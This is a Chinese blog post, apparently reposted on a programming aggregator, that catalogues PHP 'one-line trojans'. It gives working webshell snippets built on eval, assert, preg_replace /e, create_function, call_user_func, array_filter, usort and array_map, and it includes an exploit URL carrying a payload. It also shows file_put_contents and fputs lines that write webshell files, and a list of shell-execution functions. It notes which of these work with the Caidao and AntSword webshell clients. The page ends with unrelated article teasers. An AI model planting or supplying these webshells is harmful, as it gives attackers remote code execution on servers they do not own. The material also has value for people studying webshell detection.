php assert eval,代码执行函数之一句话木马

前言

大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。

eval和assert的区别

eval特点

eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)

eval()是一个语言构造器,不能被可变函数调用

eval($_REQUEST[1]); #eval一句话木马使用方式$_POST['1']($_POST['2'])   #这里我们使用可变函数,参数1传入eval会不可用

assert特点

把字符串当做php代码去执行,这里对字符串的要求吗,没有eval严格

assert在php7.0也不再是函数,变成了语言结构(不能使用可变函数了)

函数

eval()

$a = $_POST['cmd1'];

eval($a);

9f754300d88dfb037f5aa8cfde87a681.png

assert()

assert($_REQUEST['a']); #11年,16年的菜刀可以使用

# 参考链接 https://www.freebuf.com/articles/web/56616.html

3142c4b7bd86b212a2419be282bbfa1e.png

preg_replace()

这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行

preg_replace('/asd/e', $_POST['a'], 'asdfasdg');

# 14年的菜刀不行 蚁剑报错

# php5.5后开始弃用/e模式,但是经过测试11的菜刀配合php5.6还可以使用

fce1258094dbbc2213c7a08cd5f5f1e3.png

create_function()

create_function()创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。

create_function的实现步骤:

1. 获取参数, 函数体;

2. 拼凑一个"function __lambda_func (参数) { 函数体;} "的字符串;

3. eval;

4. 通过\_\_lambda_func在函数表中找到eval后得到的函数体, 找不到就出错;

5. 定义一个函数名:"\000_lambda_" . count(anonymous_functions)++;

6. 用新的函数名替换__lambda_func;

7. 返回新的函数。

8. 参考链接 https://www.t00ls.net/articles-20774.html

$func = create_function('', $_POST['cmd']);

$func();

42a96adbf1f7b2194cef202c774e565b.png

call_user_func()

把第一个参数作为回调函数调用,其余参数是回调函数的参数。

call_user_func('assert', $_REQUEST['cmd']);

# 经过测试php7.0已失效

58a117718ca7ebe9a1e51f02405b8f38.png

call_user_func_array()

调用回调函数,并把一个数组参数作为回调函数的参数

$cmd = $_REQUEST['cmd'];

$arr[0] = $cmd;

call_user_func_array('assert', $arr);

# 7.0 php测试失败

2f9f37747257b7bfe989b3d4118c48a2.png

array_filter()

第一个参数为数组,第二个参数为回调函数。这个函数的作用就是将array数组中的每个值传递给回调函数做参数。

$cmd = $_REQUEST['cmd'];

$arr = array($cmd);

$func = $_REQUEST['func'];

array_filter($arr, $func);

# 经过测试php7.0失效

b76a93b5270e1fc5ecde0c29409ad24a.png

usort()

函数执行的时候,会依次把$a中的两个值,传递给名字为my_sort函数中,所以你会看到my_sort有两个形参

参考链接http://www.am0s.com/functions/97.html

usort(...$_GET);

# php5.6以上7.0以下有效

#利用方式

#http://127.0.0.1:8999/test/project/code_run.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert

#x=phpinfo();

b042a72b7e964979247304910969c6e5.png

7400757645766bf5ca9d0a6a87ee56db.png

a4b1a781b1d413273dfc38c336a539d7.png

file_put_contents()

把一个字符串写入文件中,在浏览器访问这个文件会生成相应的木马文件。

$ma = '<?php eval($_REQUEST[cmd]);?>';#这里一定要使用单引号双引号会把$_REQUEST[]当作变量使用

file_put_contents('muma.php', $ma);

fputs()

同上

fputs(fopen('shell.php', 'w'), '<?php eval($_REQUEST[cmd])?>');

动态函数

$_GET['a']($_POST['b']);

b8a35e0779b4481edfdd089732985e3e.png

array_map()

array_map($_GET[func], array($_POST[cmd]));

9cd21ab69c715fd6efdd613f605fa4f8.png

命令执行函数(常见)

system()

将字符串当作shell命令执行,返回最后一行shell命令的执行结果

system('whoami');

375af32421ec36eae099c2cec4764789.png

passthru()

调用shell命令,把命令的执行结果输出到标准输出设备上

passthru('whoami')

2ff40eaf7c58605b37d71cc7619d053f.png

exec()

不输出结果,返回shell命令执行结果的最后一行

print(exec('whoami'));

1799cdb6de677b078564ced18c00f115.png

shell_exec()

不输出结果,返回shell命令执行的所有结果

print(shell_exec('whoami && dir'));

86505babc1b3e05e4f74c6997717c30f.png

反引号``

加了反引号的字符串将尝试作为外壳命令来执行,并将奇输出信息返回。

print(`whoami`);

6e1c2407e402fc6ffcfb5614c41deeae.png

结语

欢迎各位转发点再看,感激不尽!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/532826.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

显卡、显卡驱动、CUDA、CUDA Toolkit、cuDNN 梳理

显卡、显卡驱动、CUDA、CUDA Toolkit、cuDNN 梳理 转自&#xff1a;https://www.cnblogs.com/marsggbo/p/11838823.html#nvccnvidia-smi GPU型号含义 显卡&#xff1a; 简单理解这个就是我们前面说的GPU&#xff0c;尤其指NVIDIA公司生产的GPU系列&#xff0c;因为后面介绍的…

php中msubstr,PHP学习:thinkphp中字符截取函数msubstr()用法分析

《PHP学习&#xff1a;thinkphp中字符截取函数msubstr()用法分析》要点&#xff1a;本文介绍了PHP学习&#xff1a;thinkphp中字符截取函数msubstr()用法分析&#xff0c;希望对您有用。如果有疑问&#xff0c;可以联系我们。本文实例讲述了thinkphp中字符截取函数msubstr()用法…

VS Code的Error: Running the contributed command: ‘_workbench.downloadResource‘ failed解决

VS Code的Error: Running the contributed command: _workbench.downloadResource failed解决 转自&#xff1a;https://blog.csdn.net/ibless/article/details/118610776 1 问题描述 此前&#xff0c;本人参考网上教程在VS Code中配置了“Remote SSH”插件&#xff08;比如这…

Oracle闪回报错,oracle 闪回区满了,ORA-19815

oracle 闪回区满了&#xff0c;查看日志报错&#xff1a;ORA-19815&#xff0c;命令行输入&#xff1a;sqlplus / as sysdbastartup mount //如果你的数据库出现了无法连接的情况时&#xff0c;可以加上这句select file_type, percent_space_used as used,percent_space_rec…

[2021-ICCV] MUSIQ Multi-scale Image Quality Transformer 论文简析

[2021-ICCV] MUSIQ: Multi-scale Image Quality Transformer 论文简析 论文&#xff1a;https://arxiv.org/abs/2108.05997 代码&#xff1a;https://github.com/google-research/google-research/tree/master/musiq 概述 当前SOTA的IQA&#xff08;图像质量评估&#xff0…

安装oracle不动了,windows2008安装ORACLE到2%不动的问题 | 信春哥,系统稳,闭眼上线不回滚!...

最近又有网友遇到在windows2008服务器上安装ORACLE软件时到2%就卡住不动的问题&#xff0c;下面是该网友的描述&#xff1a;oralce 11g r2 windows server 2008 R2安装到最后一步复制数据文件时卡到2% 不走了内存一直飙升求解决这个问题前段时间也有人遇到过&#xff0c;但是他…

手把手教你入门Git --- Git使用指南(Linux)

手把手教你入门Git — Git使用指南&#xff08;Linux&#xff09; 系统&#xff1a;ubuntu 18.04 LTS 本文所有git命令操作实验具有连续性&#xff0c;git小白完全可以从头到尾跟着本文所有给出的命令走一遍&#xff0c;就会对git有一个初步的了解&#xff0c;应当能做到会用并…

linux修改主机名后oracle em控制台起不来,更改计算机名后导致Oracle dbconsole无法启动问题解决方法...

今天不知道哪根筋搭歪了&#xff0c;看着Oracle EM控制台的主机名WIN-LOSGI0TCOG0乱七八糟的很不爽&#xff0c;就把它给改了。然后Oracle EM就上不去了&#xff0c;Oracledbconsole服务起不来&#xff0c;我尝试把所有“WIN-LOSGI0TCOG0”替换成“ggsjy”&#xff0c;找了好多…

Shell脚本多行换行报错:- unrecognized arguments- \

shell error: unrecognized arguments: \ 在使用linux长命令时&#xff0c;我们通常会用一个shell脚本加\分行的形式来更清晰展示参数。 这时有一个注意事项&#xff1a;在\后必须紧跟回车&#xff0c; 否则会导致后面的参数无法传入。因为这时程序会将后面的参数算作一条新命…

shell脚本长命令带换行 注释方法

shell脚本长命令带换行 注释方法 命令行传参 在训练深度学习网络时&#xff0c;我们每次实验通常会有许多超参数需要设置&#xff0c;如batch size, epoch, gpu id, arch甚至还有一些具体的模型结构等。这事我们通常使用python模块argparse&#xff0c;在命令行进行传参。 比…

php对中英文字符串进行截取,利用php怎么对中英文混合的字符串进行截取

利用php怎么对中英文混合的字符串进行截取发布时间&#xff1a;2021-01-04 15:31:24来源&#xff1a;亿速云阅读&#xff1a;103作者&#xff1a;Leah利用php怎么对中英文混合的字符串进行截取&#xff1f;很多新手对此不是很清楚&#xff0c;为了帮助大家解决这个难题&#xf…

Linux查找命令find、loacte、whereis、which、type梳理

Linux查找命令find、loacte、whereis、which、type梳理 Linux操作系统中有5种常用的查找命令&#xff1a;find&#xff0c;locate&#xff0c;whereis&#xff0c;which&#xff0c;type&#xff0c;他们分别用于查找不同的东西&#xff0c;本文将就他们各自的功能进行一下梳理…

php数据关系图,如何利用navicat查看数据表的ER关系图

文章背景&#xff1a;(相关推荐&#xff1a;navicat)由于工作需要&#xff0c;现在要分析一个数据库&#xff0c;然后查看各个表之间的关系&#xff0c;所以需要查看表与表之间的关系图&#xff0c;专业术语叫做ER关系图。默认情况下&#xff0c;Navicat显示的界面是这样的&…

Linux软链接的使用

Linux软链接的使用 转自&#xff1a;https://www.cnblogs.com/sueyyyy/p/10985443.html&#xff0c;本博文仅对原博排版稍微优化。 更为细致的硬链接、软链接的介绍可参考&#xff1a;Linux中的硬链接和软链接 另外&#xff0c;提供笔者对软连接的一个最简单的理解&#xff…

oracle死锁优化,Oracle性能优化之LockContention(转)

1、概念DML事务使用row-level locks,查询不会锁定数据。锁有两种模式&#xff1a;exlusive、share。锁的类型&#xff1a;• DML or data locks:– Table-level locks(TM)– Row-level locks(TX)• DDL or dictionary locks一个transaction至少获得两个锁&#xff1a;一个共享的…

Linux中g++与gcc的区别

转自&#xff1a;https://blog.csdn.net/bit_clearoff/article/details/53965514 Windows中我们常用vs来编译编写好的C和C代码&#xff1b;vs把编辑器&#xff0c;编译器和调试器等工具都集成在这一款工具中&#xff0c;在Linux下我们能用什么工具来编译所编写好的代码呢&#…

linux系统可以用迅雷吗,在Linux系统下使用wine运行迅雷5的方法

在Linux系统下使用wine运行迅雷5的方法一、下载ies4linux去 http://www.tatanka.com.br/ies4linux/page/Installation 下载ies4linux的文件包(目前版本为2.99)&#xff0c;然后解压缩。注意&#xff1a;这个网站被大陆和谐了&#xff0c;需要跳墙。至于怎么跳&#xff0c;诸位就…

从C源代码到可执行文件的四个过程:预处理、编译、汇编、链接

从C源代码到可执行文件的四个过程&#xff1a;预处理、编译、汇编、链接 总览 我们将在Linux操作系统中&#xff0c;以C语言的Hello World程序为例&#xff0c;用gcc编译器分步执行这四个步骤。 我们有再熟悉不过的HelloWorld程序&#xff0c;hello.c&#xff1a; #include …

uboot引导linux内核,u-boot启动内核的几种方式

1.uboot启动内核的代码缩减如下&#xff1a;s getenv ("bootcmd");debug ("### main_loop: bootcmd\"%s\"\n", s ? s : "");if (bootdelay > 0 && s && !abortboot (bootdelay)){run_command (s, 0);}2.假设boot…

跟我一起写makefile: 概述、介绍、规则

跟我一起写makefile 概述、介绍、规则 转自&#xff1a;https://seisman.github.io/how-to-write-makefile/rules.html 概述 什么是makefile&#xff1f;或许很多Windows的程序员都不知道这个东西&#xff0c;因为那些Windows的集成开发环境&#xff08;integrated developm…